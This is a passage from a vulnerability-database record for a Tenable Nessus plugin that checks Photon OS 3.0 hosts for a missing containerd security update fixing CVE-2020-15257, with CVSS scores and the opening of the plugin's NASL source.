"cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.2, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.7}, "published": "2020-12-03T00:00:00", "type": "nessus", "title": "Photon OS 3.0: Containerd PHSA-2020-3.0-0168", "bulletinFamily": "scanner", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15257"], "modified": "2021-01-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:containerd", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2020-3_0-0168_CONTAINERD.NASL", "href": "https://www.tenable.com/plugins/nessus/143448", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-3.0-0168. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143448);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\"CVE-2020-15257\");\n\n script_name(english:\"Photon OS 3.0: Containerd PHSA-2020-3.0-0168\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the containerd package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-168.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_ba